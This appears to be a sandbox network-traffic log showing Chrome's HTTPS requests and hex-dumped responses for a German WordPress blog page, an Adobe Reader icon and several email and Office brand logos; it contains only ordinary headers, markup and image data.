                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                sec-ch-ua-mobile: ?0
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                Sec-Fetch-Site: cross-site
                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                Sec-Fetch-Dest: image
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                2025-01-08 06:22:53 UTC444INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Wed, 08 Jan 2025 06:22:52 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Vary: Accept-Encoding
                                                                                                SG-F-Cache: BYPASS
                                                                                                X-Cache-Enabled: True
                                                                                                X-Content-Type-Options: nosniff
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                Link: <https://publishing.blog/wp-json/>; rel="https://api.w.org/"
                                                                                                X-Httpd-Modphp: 1
                                                                                                Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                                                                X-Proxy-Cache: HIT
                                                                                                2025-01-08 06:22:53 UTC15940INData Raw: 38 30 30 30 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 2c 20 6d 61
                                                                                                Data Ascii: 8000<!doctype html><html lang="de"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><meta name='robots' content='index, follow, max-image-preview:large, ma
                                                                                                2025-01-08 06:22:53 UTC16384INData Raw: 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 77 68 69 74 65 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d
                                                                                                Data Ascii: preset--color--black) !important;}.has-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--white) !important;}.has-pale-pink-border-color{border-


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                17192.168.2.44977365.9.66.174434548C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-08 06:22:52 UTC419OUTGET /wp-content/uploads/sites/451/2018/08/Apps-Adobe-Acrobat-Reader-Metro-icon.png HTTP/1.1
                                                                                                Host: help.lafayette.edu
                                                                                                Connection: keep-alive
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                Accept: */*
                                                                                                Sec-Fetch-Site: none
                                                                                                Sec-Fetch-Mode: cors
                                                                                                Sec-Fetch-Dest: empty
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                2025-01-08 06:22:53 UTC544INHTTP/1.1 200 OK
                                                                                                Content-Type: image/png
                                                                                                Content-Length: 10352
                                                                                                Connection: close
                                                                                                Date: Wed, 08 Jan 2025 06:22:51 GMT
                                                                                                Server: Apache/2.4.62 (Debian)
                                                                                                Last-Modified: Fri, 12 Jun 2020 19:04:43 GMT
                                                                                                ETag: "2870-5a7e7bffd37b7"
                                                                                                Accept-Ranges: bytes
                                                                                                Expires: Thu, 08 Jan 2026 06:22:51 GMT
                                                                                                Cache-Control: public, max-age=84600, immutable
                                                                                                X-Cache: Hit from cloudfront
                                                                                                Via: 1.1 b8fb5d47d5536b63dd25111404e6e2e4.cloudfront.net (CloudFront)
                                                                                                X-Amz-Cf-Pop: FRA56-C1
                                                                                                X-Amz-Cf-Id: yyLcF5Fv8OKWCK6ITI4yLArCQ_9-wHvvGqXVNa6eu-Ue7aRw1cZwlw==
                                                                                                Age: 1
                                                                                                2025-01-08 06:22:53 UTC10352INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 01 00 08 06 00 00 00 5c 72 a8 66 00 00 28 37 49 44 41 54 78 da ed 9d 07 7c 8d d7 ff c7 3f f7 66 47 64 0b 89 11 44 ec 10 89 a8 55 7b d7 6c ad da ad a2 b4 8a a2 4b 29 6d 75 a0 7f da 52 45 07 4a ad da 7b 94 9a 45 86 2c 89 11 33 44 08 b2 f7 b8 ff e7 1c e5 87 dc fb dc 9b 48 ee f3 3c b9 df 77 eb 15 b9 e7 e4 dc 73 ae 3c 9f b3 be 43 75 b4 9a 95 06 04 41 98 24 2a 12 00 82 30 5d 48 00 08 c2 84 21 01 20 08 13 86 04 80 20 4c 18 12 00 82 30 61 48 00 08 c2 84 21 01 20 08 13 86 04 80 20 4c 18 12 00 82 30 61 48 00 08 c2 84 21 01 20 08 13 86 04 80 20 4c 18 12 00 82 30 61 48 00 08 c2 84 21 01 20 08 13 86 04 80 20 4c 18 12 00 82 30 61 48 00 08 c2 84 21 01 20 08 13 86 04 80 20 4c 18 12 00 82 30 61 48 00 08 c2
                                                                                                Data Ascii: PNGIHDR\rf(7IDATx|?fGdDU{lK)muREJ{E,3DH<ws<CuA$*0]H! L0aH! L0aH! L0aH! L0aH! L0aH


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                18192.168.2.44977535.207.98.74434548C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-08 06:22:53 UTC339OUTGET / HTTP/1.1
                                                                                                Host: publishing.blog
                                                                                                Connection: keep-alive
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                Accept: */*
                                                                                                Sec-Fetch-Site: none
                                                                                                Sec-Fetch-Mode: cors
                                                                                                Sec-Fetch-Dest: empty
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                2025-01-08 06:22:54 UTC444INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Wed, 08 Jan 2025 06:22:54 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Vary: Accept-Encoding
                                                                                                SG-F-Cache: BYPASS
                                                                                                X-Cache-Enabled: True
                                                                                                X-Content-Type-Options: nosniff
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                Link: <https://publishing.blog/wp-json/>; rel="https://api.w.org/"
                                                                                                X-Httpd-Modphp: 1
                                                                                                Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                                                                X-Proxy-Cache: HIT
                                                                                                2025-01-08 06:22:54 UTC15940INData Raw: 38 30 30 30 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 2c 20 6d 61
                                                                                                Data Ascii: 8000<!doctype html><html lang="de"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><meta name='robots' content='index, follow, max-image-preview:large, ma
                                                                                                2025-01-08 06:22:54 UTC16384INData Raw: 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 77 68 69 74 65 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d
                                                                                                Data Ascii: preset--color--black) !important;}.has-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--white) !important;}.has-pale-pink-border-color{border-
                                                                                                2025-01-08 06:22:54 UTC16384INData Raw: 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 76 61 72 20 50 77 70 4a 73 56 61 72 73 20 3d 20 7b 22 41 6a 61 78 55 52 4c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 70 75 62 6c 69 73 68 69 6e 67 2e 62 6c 6f 67 5c 2f 77 70 2d 61 64 6d 69 6e 5c 2f 61 64 6d 69 6e 2d 61 6a 61 78 2e 70 68 70 22 2c 22 68 6f 6d 65 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 70 75 62 6c 69 73 68 69 6e 67 2e 62 6c 6f 67 5c 2f 22 2c 22 69 6e 73 74 61 6c 6c 70 72 6f 6d 70 74 22 3a 7b 22 6d 6f 64 65 22 3a 22 6e 6f 72 6d 61 6c 22 2c 22 70 61 67 65 6c 6f 61 64 73 22 3a 22 32 22 2c 22 6f 6e 63 6c 69 63 6b 22 3a 22 22 7d 2c 22 6d 65 73 73 61 67 65 5f 70 75 73 68 72 65 6d 6f 76 65 5f 66 61 69 6c 65 64 22 3a 22 44 65 76 69 63 65 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 6d 6f 76 65 64 2e 22
                                                                                                Data Ascii: /javascript'>var PwpJsVars = {"AjaxURL":"https:\/\/publishing.blog\/wp-admin\/admin-ajax.php","homeurl":"https:\/\/publishing.blog\/","installprompt":{"mode":"normal","pageloads":"2","onclick":""},"message_pushremove_failed":"Device could not be removed."
                                                                                                2025-01-08 06:22:54 UTC16384INData Raw: 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 74 6f 67 67 6c 65 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 74 6f 67 67 6c 65 2d 69 74 65 6d 22 3e 3c 64 69 76 20 69 64 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 74 61 62 2d 74 69 74 6c 65 2d 31 37 37 31 22 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 74 61 62 2d 74 69 74 6c 65 22 20 64 61 74 61 2d 74 61 62 3d 22 31 22 20 72 6f 6c 65 3d 22 62 75 74 74 6f 6e 22 20 61 72 69 61 2d 63 6f 6e 74 72 6f 6c 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 74 61 62 2d 63 6f 6e 74 65 6e 74 2d 31 37 37 31 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 3e 20 3c 61 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 74 6f 67 67 6c 65 2d 74 69 74 6c 65 22 20 74 61 62 69 6e 64 65 78
                                                                                                Data Ascii: ss="elementor-toggle"><div class="elementor-toggle-item"><div id="elementor-tab-title-1771" class="elementor-tab-title" data-tab="1" role="button" aria-controls="elementor-tab-content-1771" aria-expanded="false"> <a class="elementor-toggle-title" tabindex
                                                                                                2025-01-08 06:22:54 UTC16384INData Raw: 62 38 39 32 66 35 38 61 34 34 34 62 63 39 65 30 66 22 3e 46 69 67 6d 61 3c 2f 6c 61 62 65 6c 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 73 66 2d 6c 65 76 65 6c 2d 30 20 73 66 2d 69 74 65 6d 2d 35 35 32 22 20 64 61 74 61 2d 73 66 2d 63 6f 75 6e 74 3d 22 38 39 22 20 64 61 74 61 2d 73 66 2d 64 65 70 74 68 3d 22 30 22 3e 3c 69 6e 70 75 74 20 20 63 6c 61 73 73 3d 22 73 66 2d 69 6e 70 75 74 2d 63 68 65 63 6b 62 6f 78 22 20 74 79 70 65 3d 22 63 68 65 63 6b 62 6f 78 22 20 76 61 6c 75 65 3d 22 67 6f 6f 67 6c 65 22 20 6e 61 6d 65 3d 22 5f 73 66 74 5f 70 6f 73 74 5f 74 61 67 5b 5d 22 20 69 64 3d 22 73 66 2d 69 6e 70 75 74 2d 63 37 66 33 61 65 31 61 30 34 36 31 63 35 62 34 32 65 36 39 62 34 37 63 66 31 63 31 66 62 36 31 22 3e 3c 6c 61 62 65 6c 20 63 6c 61 73
                                                                                                Data Ascii: b892f58a444bc9e0f">Figma</label></li><li class="sf-level-0 sf-item-552" data-sf-count="89" data-sf-depth="0"><input class="sf-input-checkbox" type="checkbox" value="google" name="_sft_post_tag[]" id="sf-input-c7f3ae1a0461c5b42e69b47cf1c1fb61"><label clas
                                                                                                2025-01-08 06:22:54 UTC16384INData Raw: 65 6d 65 6e 74 6f 72 2d 69 63 6f 6e 2d 6c 69 73 74 2d 69 63 6f 6e 20 69 7b 66 6f 6e 74 2d 73 69 7a 65 3a 30 70 78 3b 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 34 31 38 33 35 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 64 62 33 32 63 62 35 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 69 63 6f 6e 2d 6c 69 73 74 2d 69 63 6f 6e 20 73 76 67 7b 2d 2d 65 2d 69 63 6f 6e 2d 6c 69 73 74 2d 69 63 6f 6e 2d 73 69 7a 65 3a 30 70 78 3b 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 34 31 38 33 35 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 64 62 33 32 63 62 35 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 69 63 6f 6e 2d 6c 69 73 74 2d 74 65 78 74 2c 20 2e 65 6c 65 6d
                                                                                                Data Ascii: ementor-icon-list-icon i{font-size:0px;}.elementor-41835 .elementor-element.elementor-element-db32cb5 .elementor-icon-list-icon svg{--e-icon-list-icon-size:0px;}.elementor-41835 .elementor-element.elementor-element-db32cb5 .elementor-icon-list-text, .elem
                                                                                                2025-01-08 06:22:54 UTC16384INData Raw: 2d 69 6e 66 6f 22 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 69 63 6f 6e 2d 6c 69 73 74 2d 69 74 65 6d 20 65 6c 65 6d 65 6e 74 6f 72 2d 72 65 70 65 61 74 65 72 2d 69 74 65 6d 2d 66 37 62 64 34 61 37 22 3e 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 69 63 6f 6e 2d 6c 69 73 74 2d 74 65 78 74 20 65 6c 65 6d 65 6e 74 6f 72 2d 70 6f 73 74 2d 69 6e 66 6f 5f 5f 69 74 65 6d 20 65 6c 65 6d 65 6e 74 6f 72 2d 70 6f 73 74 2d 69 6e 66 6f 5f 5f 69 74 65 6d 2d 2d 74 79 70 65 2d 63 75 73 74 6f 6d 22 3e 20 53 69 6d 65 61 20 4d 65 72 6b 69 20 3c 2f 73 70 61 6e 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 69 63 6f 6e 2d 6c 69 73 74 2d 69 74 65 6d 20 65 6c 65 6d 65 6e 74 6f 72 2d 72 65 70
                                                                                                Data Ascii: -info"><li class="elementor-icon-list-item elementor-repeater-item-f7bd4a7"> <span class="elementor-icon-list-text elementor-post-info__item elementor-post-info__item--type-custom"> Simea Merki </span></li><li class="elementor-icon-list-item elementor-rep
                                                                                                2025-01-08 06:22:54 UTC16384INData Raw: 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 20 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 39 66 35 65 64 63 61 20 65 2d 63 6f 6e 2d 66 75 6c 6c 20 70 6f 73 74 2d 77 72 61 70 70 65 72 2d 64 65 66 61 75 6c 74 2d 70 6f 73 74 20 65 2d 66 6c 65 78 20 65 2d 63 6f 6e 20 65 2d 63 68 69 6c 64 22 20 64 61 74 61 2d 69 64 3d 22 39 66 35 65 64 63 61 22 20 64 61 74 61 2d 65 6c 65 6d 65 6e 74 5f 74 79 70 65 3d 22 63 6f 6e 74 61 69 6e 65 72 22 20 64 61 74 61 2d 73 65 74 74 69 6e 67 73 3d 22 7b 26 71 75 6f 74 3b 62 61 63 6b 67 72 6f 75 6e 64 5f 62 61 63 6b 67 72 6f 75 6e 64 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 63 6c 61 73 73 69 63 26 71 75 6f 74 3b 7d 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d
                                                                                                Data Ascii: lass="elementor-element elementor-element-9f5edca e-con-full post-wrapper-default-post e-flex e-con e-child" data-id="9f5edca" data-element_type="container" data-settings="{&quot;background_background&quot;:&quot;classic&quot;}"><div class="elementor-elem
                                                                                                2025-01-08 06:22:54 UTC16384INData Raw: 31 31 2f 6e 65 77 2d 77 6f 72 6b 2d 73 6d 61 72 74 69 76 65 2d 33 30 30 78 31 36 39 2e 70 6e 67 20 33 30 30 77 2c 20 68 74 74 70 73 3a 2f 2f 70 75 62 6c 69 73 68 69 6e 67 2e 62 6c 6f 67 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 34 2f 31 31 2f 6e 65 77 2d 77 6f 72 6b 2d 73 6d 61 72 74 69 76 65 2d 37 36 38 78 34 33 32 2e 70 6e 67 20 37 36 38 77 2c 20 68 74 74 70 73 3a 2f 2f 70 75 62 6c 69 73 68 69 6e 67 2e 62 6c 6f 67 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 34 2f 31 31 2f 6e 65 77 2d 77 6f 72 6b 2d 73 6d 61 72 74 69 76 65 2d 32 30 30 78 31 31 33 2e 70 6e 67 20 32 30 30 77 2c 20 68 74 74 70 73 3a 2f 2f 70 75 62 6c 69 73 68 69 6e 67 2e 62 6c 6f 67 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73
                                                                                                Data Ascii: 11/new-work-smartive-300x169.png 300w, https://publishing.blog/wp-content/uploads/2024/11/new-work-smartive-768x432.png 768w, https://publishing.blog/wp-content/uploads/2024/11/new-work-smartive-200x113.png 200w, https://publishing.blog/wp-content/uploads
                                                                                                2025-01-08 06:22:54 UTC16384INData Raw: 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 34 2f 30 39 2f 66 69 72 65 66 6c 79 2d 6b 75 72 73 2d 73 65 70 74 65 6d 62 65 72 2d 32 30 32 34 2d 33 30 30 78 31 35 30 2e 70 6e 67 20 33 30 30 77 2c 20 68 74 74 70 73 3a 2f 2f 70 75 62 6c 69 73 68 69 6e 67 2e 62 6c 6f 67 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 34 2f 30 39 2f 66 69 72 65 66 6c 79 2d 6b 75 72 73 2d 73 65 70 74 65 6d 62 65 72 2d 32 30 32 34 2d 37 36 38 78 33 38 34 2e 70 6e 67 20 37 36 38 77 2c 20 68 74 74 70 73 3a 2f 2f 70 75 62 6c 69 73 68 69 6e 67 2e 62 6c 6f 67 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 34 2f 30 39 2f 66 69 72 65 66 6c 79 2d 6b 75 72 73 2d 73 65 70 74 65 6d 62 65 72 2d 32 30 32 34 2d 32 30 30 78 31 30 30 2e 70 6e 67 20 32
                                                                                                Data Ascii: ent/uploads/2024/09/firefly-kurs-september-2024-300x150.png 300w, https://publishing.blog/wp-content/uploads/2024/09/firefly-kurs-september-2024-768x384.png 768w, https://publishing.blog/wp-content/uploads/2024/09/firefly-kurs-september-2024-200x100.png 2


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                19192.168.2.45005878.46.22.254432936C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-08 06:24:00 UTC692OUTGET /uploads/microsoft-office-png-logo/microsoft-outlook-png-logo-1.png HTTP/1.1
                                                                                                Host: www.freepnglogos.com
                                                                                                Connection: keep-alive
                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                sec-ch-ua-mobile: ?0
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                Sec-Fetch-Site: cross-site
                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                Sec-Fetch-Dest: image
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                If-None-Match: "6300eb34-a1b9"
                                                                                                If-Modified-Since: Sat, 20 Aug 2022 14:09:56 GMT
                                                                                                2025-01-08 06:24:00 UTC227INHTTP/1.1 304 Not Modified
                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                Date: Wed, 08 Jan 2025 06:24:00 GMT
                                                                                                Last-Modified: Sat, 20 Aug 2022 14:09:56 GMT
                                                                                                Connection: close
                                                                                                ETag: "6300eb34-a1b9"
                                                                                                Cache-Control: no-cache, must-revalidate


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                20192.168.2.45005678.46.22.254432936C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-08 06:24:00 UTC703OUTGET /uploads/microsoft-office-png-logo/microsoft-office-2013-symbol-logo-png-6.png HTTP/1.1
                                                                                                Host: www.freepnglogos.com
                                                                                                Connection: keep-alive
                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                sec-ch-ua-mobile: ?0
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                Sec-Fetch-Site: cross-site
                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                Sec-Fetch-Dest: image
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                If-None-Match: "6300eb34-30d5"
                                                                                                If-Modified-Since: Sat, 20 Aug 2022 14:09:56 GMT
                                                                                                2025-01-08 06:24:00 UTC227INHTTP/1.1 304 Not Modified
                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                Date: Wed, 08 Jan 2025 06:24:00 GMT
                                                                                                Last-Modified: Sat, 20 Aug 2022 14:09:56 GMT
                                                                                                Connection: close
                                                                                                ETag: "6300eb34-30d5"
                                                                                                Cache-Control: no-cache, must-revalidate


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                21192.168.2.45005778.46.22.254432936C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-08 06:24:00 UTC664OUTGET /uploads/red-email-mail-logo-png-8.png HTTP/1.1
                                                                                                Host: www.freepnglogos.com
                                                                                                Connection: keep-alive
                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                sec-ch-ua-mobile: ?0
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                Sec-Fetch-Site: cross-site
                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                Sec-Fetch-Dest: image
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                If-None-Match: "6300eb2b-23834"
                                                                                                If-Modified-Since: Sat, 20 Aug 2022 14:09:47 GMT
                                                                                                2025-01-08 06:24:00 UTC228INHTTP/1.1 304 Not Modified
                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                Date: Wed, 08 Jan 2025 06:24:00 GMT
                                                                                                Last-Modified: Sat, 20 Aug 2022 14:09:47 GMT
                                                                                                Connection: close
                                                                                                ETag: "6300eb2b-23834"
                                                                                                Cache-Control: no-cache, must-revalidate


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                22192.168.2.45005578.46.22.254432936C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-08 06:24:00 UTC661OUTGET /uploads/gmail-email-logo-png-12.png HTTP/1.1
                                                                                                Host: www.freepnglogos.com
                                                                                                Connection: keep-alive
                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                sec-ch-ua-mobile: ?0
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                sec-ch-ua-platform: "Windows"
